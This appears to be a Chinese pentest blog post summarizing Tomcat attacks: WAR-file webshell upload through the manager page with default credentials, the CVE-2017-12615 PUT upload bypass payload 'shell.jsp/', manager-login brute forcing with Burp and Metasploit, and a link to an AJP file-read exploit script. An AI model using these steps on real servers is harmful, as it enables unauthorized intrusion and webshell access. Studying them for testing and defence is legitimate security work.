zoukankan      html  css  js  c++  java
  • tomcat漏洞利用总结

    一、后台war包getshell

      漏洞利用:

      tomcat在conf/tomcat-users.xml配置用户权限

    <?xml version="1.0" encoding="UTF-8"?>
    <tomcat-users xmlns="http://tomcat.apache.org/xml"
                  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                  xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
                  version="1.0">
    
        <role rolename="manager-gui"/>
        <role rolename="manager-script"/>
        <role rolename="manager-jmx"/>
        <role rolename="manager-status"/>
        <role rolename="admin-gui"/>
        <role rolename="admin-script"/>
        <user username="tomcat" password="tomcat" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script" />
        
    </tomcat-users>
    

      

      1、构建war包  

      jar cvf shell.war test.jsp
    

       

      

      2、后台页面上传tomcat自动解压war包

      http://172.16.20.134:8080/manager/html

      

      3、cknife连接getshell

      http://172.16.20.134:8080/shell/test.jsp

      

    二、tomcat任意上传漏洞CVE-2017--12615

      漏洞利用: 

       conf/web.xml处理.jsp 和 .jspx 的时候,是通过JspServlet处理请求的,当.jsp后面有空格的时候交给defaultServlet处理

      影响windows linux

      

      1、访问域名抓包

      payload:

      shell.jsp/
    

      put上传shell.jsp/ 绕过windows,linux。

      

      

      2、访问域名http://172.16.20.134:8080/test.jsp getshell

      

    三、后台爆破

      1、后台base64编码传输

      抓包 

      

      字段解密为:

      

      payload选择custom itrerator

      

      

      

      

      选择base64编码

      

      点这爆破

      

      msf爆破search tomcat_mgr_login

     四.CNVD-2020-10487-Tomcat-Ajp-lfi

    Tomcat-Ajp协议文件读取漏洞

    工具地址:https://github.com/AdministratorGithub/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py

    image

     

  • 相关阅读:
    13-Smell味道-调味料
    12-Juice饮料
    11-Snack小吃
    10-Meat肉类
    09-Fruit水果
    08-Vegetables蔬菜
    [svc]共享内存
    [sql]sql的select字符串切割
    [js] 渲染树构建、布局及绘制
    [js]变量提升-关于条件
  • 原文地址:https://www.cnblogs.com/junsec/p/11269902.html
Copyright © 2011-2022 走看看